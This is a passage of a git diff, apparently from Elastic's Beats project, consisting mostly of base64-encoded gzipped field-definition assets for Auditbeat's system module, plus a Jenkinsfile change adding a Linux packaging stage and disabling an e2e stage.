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" } diff --git a/x-pack/auditbeat/Jenkinsfile.yml b/x-pack/auditbeat/Jenkinsfile.yml index deb1fdddd3a4..7a1edec5dd27 100644 --- a/x-pack/auditbeat/Jenkinsfile.yml +++ b/x-pack/auditbeat/Jenkinsfile.yml @@ -81,3 +81,7 @@ stages: mage: "mage build unitTest" platforms: ## override default labels in this specific stage. - "windows-7-32-bit" + packaging-linux: + packaging-linux: "mage package" + e2e: + enabled: false diff --git a/x-pack/auditbeat/module/system/fields.go b/x-pack/auditbeat/module/system/fields.go index 2fc71f8ac335..24f8a73989d3 100644 --- a/x-pack/auditbeat/module/system/fields.go +++ b/x-pack/auditbeat/module/system/fields.go @@ -19,5 +19,5 @@ func init() { // AssetSystem returns asset data. // This is the base64 encoded gzipped contents of module/system. func AssetSystem() string { - return "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" + return 